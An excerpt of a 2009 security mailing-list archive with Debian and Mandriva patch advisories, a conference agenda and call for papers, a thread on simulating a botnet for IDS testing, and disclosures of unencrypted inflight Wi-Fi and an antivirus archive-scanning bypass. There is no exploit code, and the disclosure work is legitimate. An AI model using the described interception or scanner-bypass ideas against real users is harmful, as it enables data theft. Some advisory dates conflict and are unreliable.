http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 96436 ce5725e282720dfbde022c37d56b4bf4 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 115882 1c3660d4430f874b5df972f8d65fc89c http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 245392 faf6f0c1d73faa7b18b567a992bf0ccf http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 77460 00437705fa464547d477e5787c5c4ab6 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 1079000 7ee79717437c23727d538d9be311fa1a http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 860746 1fc710f8ebd8bc901085239d9239a461 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 174706 69ff9738d14e93a08c0cf99610c272d9 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 499304 935611522d88526bbab0043a201fcc7d http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 2379254 0c4096e5f4ec0a2436e4e6cb4d0e964f http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 148264 f0a54f4705a85ba4872eb86752d3a3a1 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 109152 311f4ae4a6e389b74bbe402c025f6335 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 774148 22fe7312a5fb51ca29bd2aae9978e2f2 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 13502 50d978d665a3bf11d9b2ae3cfe0bb5a2 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 445506 1d14d9a19d25e0093cfdfba05fdfa297 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 889946 66918f0179c15859f58acd07960dfd8c http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 26522042 341acf33eaea52e3cc7ce4c0496be4f6 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 245192 49f4712771d91fc8334874622107c10a http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 92960 786b5a1faa9ac0b064e3f7c034cb1750 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 552320 c9152403f7f15a9e9f50b81955327851 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 65902 43acaf29b90c9b2ed6b20804fdab4d9e http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_powerpc.deb Size/MD5 checksum: 183444 2cd74fcaa131e77772cd6246f30a6787 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 545552 5ecc4b81ed5a666b2d1badfd5f37ea2e http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 2316640 4309c27dbe563f7472cb21da7586cae8 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 63226 2b3694eb878128f5dae3d6a6468103fb http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 144820 d2f466e5d021e43f4c60abe73cbe2aa9 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 270630 d2d3bf53a18c1f77a505f891150a027d http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 113006 44e08268dad122fa8014081807c5bfb4 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 106236 07d0235cb8a47e3a67d771870fae0b32 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 251268 7640117e7b3ce3de2b6a8c4d4b8164dc http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 147742 9802165843c32f9a6ff6e8370ca87cbd http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 93564 b8bd35cb52760b51b37d66eb76e05dec http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 424942 5b80b03ae1a98c75b2fe456fcdbe9f21 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 877384 188e4a2bbf7cf70c2c0fda370134f8f7 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 775834 a6cc496f2aae5971bf22c7eb7dcef33a http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 75214 730a24933cf8b75b91ac20ceaee56611 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 247912 07fc597207d506959b1a06b24e72d22a http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 1107384 a295fb93c4dac09f9a811a7d657d953e http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 94358 1164bcac53e6fb3e441668d5d425f3b0 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 501788 558e7489907c25459d7f6f71e84c60ed http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 1201460 b69c1b31d59a0dbc08613a257126d31a http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 13494 6802989fced5f26ebbefc76a524c37f1 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 26212182 6c365927ca3b530fac689af8c251aa2d http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 901164 97b49f6789d8f0d1b4fad1c43a736b24 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 183490 51085c635eab8f84d823e130c104a7ec http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_s390.deb Size/MD5 checksum: 174622 23f2c760e59c4f16618567bb05808c06 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 142312 4b95d21a81fe8acda3948b18a17e255b http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 387444 ad8be325a6c214cfcee83e6231ebe282 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 536484 14c7fc971a39c76034938ed20e282d0c http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 487168 54a3ea6ea8e479c29ce6de334d20fe12 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 2295810 886cc8756b8c88ae9f39a5663da41b66 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 251524 ce3fcf5dcea8dadb8a8340a9c8369484 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 835054 fc902a88b1591c1167c7e15599262a7c http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 25134110 54499557e99be3114d2253c30878dfb8 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 1054274 29c9a4b66b6ddadc214b26d4ac001a4d http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 61522 51ac0faa96ec2a9a1ed408ccceded01e http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 94364 71b741e9b9c864678bee978b9b782d13 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 1288616 0efcba64c49ff8dee826fd5d19303389 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 99064 8ab8e3cdb467a8f6012f44be07cdc6f2 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 83342 cb6b0bd4e7b384500a5f061bcca852c9 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 13500 afd2790ea28d4edad211a7bed2817ddb http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 791016 00c6dcd665a995486002f019372e19e1 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 169150 cc6d29090b9d1eb1bc92bf4201d9eff8 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 129360 f71a036c5a2a24fbf9f8e3923f00f0c3 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 761142 885e60cc1694fb40f9ffe6280c756984 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 230038 e03caca49d68f845ab81eab6a3a4e666 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 105244 84f033793d4a42f0b6235565ad963251 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 72270 c175dd0ec48337d70f3d1dc5ba26ed53 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 172602 ee221972ebbec5844c3e8b5e112c1138 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_sparc.deb Size/MD5 checksum: 218246 35ef9dd3d2970b90341da2302cbcbdfe These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKAboUYrVLjBFATsMRAnUeAJ463bZnpTfDxv07ailUxELRPhBFVACgg5F7 yYM4M45m2RGa3dA0P2c2Ook= =pLv4 -----END PGP SIGNATURE----- From dr at kyx.net Wed May 6 23:19:30 2009 From: dr at kyx.net (Dragos Ruiu) Date: Wed, 6 May 2009 15:19:30 -0700 Subject: [Full-disclosure] EUSecWest 2009 (May27/28) London Agenda and PacSec 2009 (Nov 4/5) Tokyo CFP deadline: June 1 2009 Message-ID: <200905061519.30815.dr@kyx.net> EUSecWest 2009 Speakers Efficient UAK Recovery attacks against DECT - Ralf-Philipp Weinmann, University of Luxembourg A year in the life of an Adobe Flash security researcher - Peleus Uhley, Adobe Pwning your grandmother's iPhone - Charley Miller, Independent Security Evaluators Post exploitation techniques on OSX and Iphone and other TBA matters. - Vincent Iozzo,Zynamics STOP!! Objective-C Run-TIME. - nemo Exploiting Delphi/Pascal - Ilja Van Sprundel, IOActive PCI bus based operating system attack and protections - Christophe Devine & Guillaume Vissian, Thales Thoughts about Trusted Computing - Joanna Rutkowska, Invisible Things Lab Nice NIC you got there... does it come with an SSH daemon? - Arrigo Trulzi Evolving Microsoft Exploit Mitigations - Tim Burrell & Peter Beck, Microsoft Malware Case Study: the ZeuS evolution - Vicente Diaz, S21Sec Writing better XSS payloads - Alex Kouzemtchenko, SIFT Exploiting Firefox Extensions -Roberto Suggi Liverani & Nick Freeman, Security-Assessment.com Stored Value Gift Cards, Magstripes Revisited - Adrian Pastor, Gnucitizen, Corsaire Advanced SQL Injection to operating system control - Bernardo Damele Assumpcao Guimaraes, Portcullis Cloning Mifare Classic - Nicolas Courtois, University of London Rootkits on Windows Mobile/Embedded - Petr Matousek, Coseinc PacSec 2009 CALL FOR PAPERS World Security Pros To Converge on Japan TOKYO, Japan -- To address the increasing importance of information security in Japan, the best known figures in the international security industry will get together with leading Japanese researchers to share best practices and technology. The most significant new discoveries about computer network hack attacks will be presented at the seventh annual PacSec conference to be discussed. The PacSec meeting provides an opportunity for foreign specialists to be exposed to Japanese innovation and markets and collaborate on practical solutions to computer security issues. In an informal setting with a mixture of material bilingually translated in both English and Japanese the eminent technologists can socialize and attend training sessions. Announcing the opportunity to submit papers for the PacSec 2009 network security training conference. The conference will be held November 4/5th in Tokyo. The conference focuses on emerging information security tutorials - it is a bridge between the international and Japanese information security technology communities.. Please make your paper proposal submissions before June 1st, 2009. Slides for the papers must be submitted for translation by October 1, 2009 (Which, oh so rarely, happens we are going to start asking for them earlier :-P --dr). A some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and accomodations for the speakers. If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers and, speaking background to . Tutorials are one hour in length, but with simultaneous translation should be approximately 45 minutes in English, or Japanese. Only slides will be needed for the October paper deadline, full text does not have to be submitted. The PacSec conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and education for a technical audience. The conference itself is a single track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter - either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products. Paper proposals should consist of the following information: 1) Presenter, and geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax). 2) Employer and/or affiliations. 3) Brief biography, list of publications and papers. 4) Any significant presentation and educational experience/background. 5) Topic synopsis, Proposed paper title, and a one paragraph description. 6) Reason why this material is innovative or significant or an important tutorial. 7. Optionally, any samples of prepared material or outlines ready. 8. Will you have full text available or only slides? 9. Language of preference for submission. 10. Please list any other publications or conferences where this material has been or will be published/submitted. Please include the plain text version of this information in your email as well as any file, pdf, sxw, ppt, or html attachments. Please forward the above information to to be considered for placement on the speaker roster. cheers, --dr -- World Security Pros. Cutting Edge Training, Tools, and Techniques London, U.K. May 27/28 2009 ?http://eusecwest.com Tokyo, Japan November 4/5 2009 http://pacsec.jp Vancouver, Canada March 22-26 2010 http://cansecwest.com pgpkey http://dragos.com/ kyxpgp From mark.sec at gmail.com Thu May 7 00:07:48 2009 From: mark.sec at gmail.com (Mark Sec) Date: Wed, 6 May 2009 18:07:48 -0500 Subject: [Full-disclosure] Howto Simulate a BotNet ? Message-ID: <5598cfa10905061607s1a6d81a9y56916698e9ff6a89@mail.gmail.com> Does any1 know a tool. squema, info or ideas to simulate a Botnet? Ideas: A) Many Vmware (workstations) over win32 B) Make a fake traffic C) Make a scripts to simulate many hosts D) IDS/ IPS (to see the traffic) -mark -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090506/062a4be1/attachment.html From security at mandriva.com Wed May 6 23:51:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 07 May 2009 00:51:01 +0200 Subject: [Full-disclosure] [ MDVSA-2009:107 ] acpid Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:107 http://www.mandriva.com/security/ _______________________________________________________________________ Package : acpid Date : May 6, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: The daemon in acpid before 1.0.10 allows remote attackers to cause a denial of service (CPU consumption and connectivity loss) by opening a large number of UNIX sockets without closing them, which triggers an infinite loop (CVE-2009-0798). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0798 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 155761785a72a7484677cb400a81f1cf 2008.1/i586/acpid-1.0.6-4.1mnb1.i586.rpm 64667c3cdea4ae73f09f91e0a736d72d 2008.1/SRPMS/acpid-1.0.6-4.1mnb1.src.rpm Mandriva Linux 2008.1/X86_64: b3a8b19922e1f376b3a3e0ef6f150b06 2008.1/x86_64/acpid-1.0.6-4.1mnb1.x86_64.rpm 64667c3cdea4ae73f09f91e0a736d72d 2008.1/SRPMS/acpid-1.0.6-4.1mnb1.src.rpm Mandriva Linux 2009.0: 19d29f9dfbf43d0575344d12426881f7 2009.0/i586/acpid-1.0.6-6.1mnb2.i586.rpm cede80f0e98979c1150c93889a4d2948 2009.0/SRPMS/acpid-1.0.6-6.1mnb2.src.rpm Mandriva Linux 2009.0/X86_64: 5ddd2e0372f141d7d097bfd168678bd2 2009.0/x86_64/acpid-1.0.6-6.1mnb2.x86_64.rpm cede80f0e98979c1150c93889a4d2948 2009.0/SRPMS/acpid-1.0.6-6.1mnb2.src.rpm Mandriva Linux 2009.1: 9c38716a1b37b77ccad8535b8e709a9d 2009.1/i586/acpid-1.0.8-1.1mnb2.i586.rpm 39723d07c12e64f6a73f10a5254a079b 2009.1/SRPMS/acpid-1.0.8-1.1mnb2.src.rpm Mandriva Linux 2009.1/X86_64: 5b175d9e7253d03ed065f39b3fd9c3f9 2009.1/x86_64/acpid-1.0.8-1.1mnb2.x86_64.rpm 39723d07c12e64f6a73f10a5254a079b 2009.1/SRPMS/acpid-1.0.8-1.1mnb2.src.rpm Corporate 3.0: 89bb26fca70f90ac20452f9a00cfe903 corporate/3.0/i586/acpid-1.0.2-4.1.C30mdk.i586.rpm 35d2f30c3f698f16999b421956b14069 corporate/3.0/SRPMS/acpid-1.0.2-4.1.C30mdk.src.rpm Corporate 3.0/X86_64: 3a6e9a6a301ae03859f9e39f672a5d90 corporate/3.0/x86_64/acpid-1.0.2-4.1.C30mdk.x86_64.rpm 35d2f30c3f698f16999b421956b14069 corporate/3.0/SRPMS/acpid-1.0.2-4.1.C30mdk.src.rpm Corporate 4.0: 81c05ab0bda63dc01aaaa3d8b88683f9 corporate/4.0/i586/acpid-1.0.4-6.3.20060mlcs4.i586.rpm 902488807e9cf4bfd3dbd6f4bb1f07c5 corporate/4.0/SRPMS/acpid-1.0.4-6.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 7490de00cb07b4761743abf62ba76ced corporate/4.0/x86_64/acpid-1.0.4-6.3.20060mlcs4.x86_64.rpm 902488807e9cf4bfd3dbd6f4bb1f07c5 corporate/4.0/SRPMS/acpid-1.0.4-6.3.20060mlcs4.src.rpm Multi Network Firewall 2.0: 07282f9fdcc2f70f5d29c90f50bfec1c mnf/2.0/i586/acpid-1.0.2-4.1.C30mdk.i586.rpm 58da6ff91c7f0c96a02ae6cc15f0c358 mnf/2.0/SRPMS/acpid-1.0.2-4.1.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKAeevmqjQ0CJFipgRAoLgAJ9/cFhfAOSjVb9v1AB/GSoYaEBA+ACfZINQ z9wVX1YAjbEZLD94168tcp0= =+hiS -----END PGP SIGNATURE----- From advisories at netragard.com Thu May 7 02:02:24 2009 From: advisories at netragard.com (Netragard Advisories) Date: Wed, 6 May 2009 21:02:24 -0400 Subject: [Full-disclosure] [NETRAGARD SECURITY ADVISORY] [AirCell GoGo Inflight Internet -- No Encryption ][NETRAGARD-2009042] Message-ID: ********************** Netragard, L.L.C Advisory* ********************** Penetration Testing - Vulnerability Assessments - Web Application Security SNOsoft Research Team ------------------------------------------------------------------------------------------------------ http://www.netragard.com -- "The Specialist in Anti-Hacking" [POSTING NOTICE] ------------------------------------------------------------------------------------------------------ If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. The advisory can be found on the Netragard website at http://www.netragard.com/ For more information about Netragard visit http://www.netragard.com [Advisory Information] ------------------------------------------------------------------------------------------------------ Contact : Adriel T. Desautels Advisory ID : NETRAGARD-20090427 Product Name : GoGo Inflight Internet Product Version : Unknown Vendor Name : Aircell LLC. Type of Vulnerability : No link layer security option Impact : Varies Vendor Notified : 20090427 [Product Description] ------------------------------------------------------------------------------------------------------ "As a service of Aircell LLC, Gogo provides all passengers access to the Internet, email, text messaging and corporate VPNs from the comfort of their seats while airborne. Aircell has been authorized by the FAA and FCC to use cellular frequencies for inflight broadband communications, leading a Wi-Fi revolution 35,000 feet above the ground. Think of it as a mobile hotspot, equipped with twin turbines and 50,000 lbs of thrust. Partnering with a variety of carriers, Gogo provides coast-to-coast, border-to-border connectivity for all passengers. Launching with American Airlines in 2008, Gogo will continue to expand, giving everyone the ability to stay in touch, in flight?." Taken From: http://www.gogoinflight.com/jahia/Jahia/site/gogo/companyInfo [Technical Summary] ------------------------------------------------------------------------------------------------------ The GoGo Inflight Internet service does not encrypt wireless connections between GoGo Inflight Internet users ("Users") and the GoGo Inflight Internet Wireless Access Points ("WAP"). As a result any Users connection can be intercepted by another user and the data that they transmit can be stolen or their respective connections can be hijacked. [Impact] ------------------------------------------------------------------------------------------------------ [Impact varies from installation to installation] - Theft of customer data - Access to business networks - Infection of Users computer systems - Theft of personal information - Theft of Social Security Numbers - Theft of Credit Card numbers - Manipulation of in-transit data - etc. [Proof Of Concept] ------------------------------------------------------------------------------------------------------ Connect to GoGo Inflight Internet on your next flight and you will see that the connection between your device and the WAP is not encrypted. Connecting does not require paying for the service, it only requires establishing a connection to the WAP. Important Notes: ------------------------------------------------------------------------------------------------------ Because this vulnerability exists at the link layer it is possible for an attacker to defeat or subvert a users SSL based connection. This subversion would enable the attacker to capture credit card information or any other information submitted over the web. It may also be possible to subvert, defeat or hijack VPN connections as the attacker can interfere with the entire connection process. [Vendor Status and Chronology] ------------------------------------------------------------------------------------------------------ Current Vendor Status: Unable to establish communications with vendor. Chronology: 09/04/2009 07:11:57 PM EST - Vulnerability Discovered 09/27/2009 14:15:53 PM EST - Vendor Notified 04/28/2009 09:18:17 AM EST - Requested vendor feedback via email 04/28/2009 09:19:17 AM EST - Email Read Receipt Received 04/30/2009 11:40:25 AM EST - No response from vendor 04/30/2009 11:41:25 AM EST - Requested vendor feedback via email 04/30/2009 11:46:58 AM EST - Email Read Receipt Received 05/04/2009 09:00:00 AM EST - Began advisory release process No vendor response. [Solution] ------------------------------------------------------------------------------------------------------ Implement WPA2 at the link layer. [Disclaimer] --------------------------------http:// www.netragard.com--------------------------------- Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090506/1f8662c7/attachment.html From Valdis.Kletnieks at vt.edu Thu May 7 02:36:36 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 06 May 2009 21:36:36 -0400 Subject: [Full-disclosure] Howto Simulate a BotNet ? In-Reply-To: Your message of "Wed, 06 May 2009 18:07:48 CDT." <5598cfa10905061607s1a6d81a9y56916698e9ff6a89@mail.gmail.com> References: <5598cfa10905061607s1a6d81a9y56916698e9ff6a89@mail.gmail.com> Message-ID: <52302.1241660196@turing-police.cc.vt.edu> On Wed, 06 May 2009 18:07:48 CDT, Mark Sec said: > Does any1 know a tool. squema, info or ideas to simulate a Botnet? > > Ideas: > > A) Many Vmware (workstations) over win32 > B) Make a fake traffic > C) Make a scripts to simulate many hosts > D) IDS/ IPS (to see the traffic) What behavior(s) of a botnet are you trying to simulate? There's a lot of approaches, as you've already noticed - which one will work best will depend a lot on what you're trying to do. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090506/52be9c77/attachment.bin From a.noorkhan at linkbynet.com Thu May 7 05:54:16 2009 From: a.noorkhan at linkbynet.com (Aadil Noorkhan) Date: Thu, 7 May 2009 08:54:16 +0400 Subject: [Full-disclosure] Howto Simulate a BotNet ? In-Reply-To: <52302.1241660196@turing-police.cc.vt.edu> References: <5598cfa10905061607s1a6d81a9y56916698e9ff6a89@mail.gmail.com> <52302.1241660196@turing-police.cc.vt.edu> Message-ID: <1241672056.4887.1.camel@aadiln-lio> Hello, The closest I could find are: - http://pages.cs.wisc.edu/%7Epb/botnets_final.pdf (rather interesting paper about an inside look at botnets) - http://www.breakingpointsystems.com/community/blog/botnet-simulation (video about a botnet simulation by BreakingPointSystems) Cheers, Aadil. On Thu, 2009-05-07 at 05:36 +0400, Valdis.Kletnieks at vt.edu wrote: > On Wed, 06 May 2009 18:07:48 CDT, Mark Sec said: > > > Does any1 know a tool. squema, info or ideas to simulate a Botnet? > > > > Ideas: > > > > A) Many Vmware (workstations) over win32 > > B) Make a fake traffic > > C) Make a scripts to simulate many hosts > > D) IDS/ IPS (to see the traffic) > > What behavior(s) of a botnet are you trying to simulate? There's a lot > of approaches, as you've already noticed - which one will work best will > depend a lot on what you're trying to do. -- Aadil NOORKHAN Administrateur Unix ------------------------------------------------------ LINKBYNET Indian Ocean BG Court, Route Saint-Jean, Quatre Bornes, Ile Maurice Tel direct : (+33) 01 48 13 21 78 Tel : (+33) 1 48 13 00 00 Fax : (+33) 1 48 13 31 21 Email : a.noorkhan at linkbynet.com Web : www.linkbynet.com ______________________________________________________ Astreinte : http://www.linkbynet.com/astreinte/ From Thierry at Zoller.lu Thu May 7 09:55:12 2009 From: Thierry at Zoller.lu (Thierry Zoller) Date: Thu, 7 May 2009 10:55:12 +0200 Subject: [Full-disclosure] Update: [TZO-15-2009] Aladdin eSafe generic bypass - Forced release Message-ID: <77372878.20090507105512@Zoller.lu> Update: Aladdin responded and posted a blog post, please read the timeline and then the blog post. http://www.aladdin.com/AircBlog/post/2009/05/Archive-Bypass-Issue-and-eSafe.aspx It is said that : ----------------- "This means that in case a customer receives such a specially crafted archive file, he will not be able to extract it." This is wrong. Winrar for example extracts the PoC files fine. "We have acted on the issue after two days since its first coming into view." Please see the timeline below and draw your conclusions "The eSafe products affected by this vulnerability are 7.1, 7.0, and 6." I was not communicated this information and had to find a referer in my log files in order to know. Full update to be published after more discussions... ------------- IV. Disclosure timeline ~~~~~~~~~~~~~~~~~~~~~~~~~ DD/MM/YYYY 04/04/2009 : Send proof of concept, description the terms under which I cooperate and the planned disclosure date. There is no security adress listed at [1] and hence took previously known security contacts that are known to exist. No reply. 13/04/2009 : Resending. Copied security at aladdin.de, security at aladdin.com secure at aladdin.com, secure at aladdin.de,support at aladdin.com, support at aladdin.de in CC. No reply. 16/04/2009 : Resending specifying this is the last attempt to disclose reponsibly. No reply. 18/04/2009 : Online virus scan service offered to gap the bridge between vendors that don't reply and myself. Aladin was contacted through third party. No reaction 19/04/2009 : Aladdin visited the blog entry that explains the bypasses and 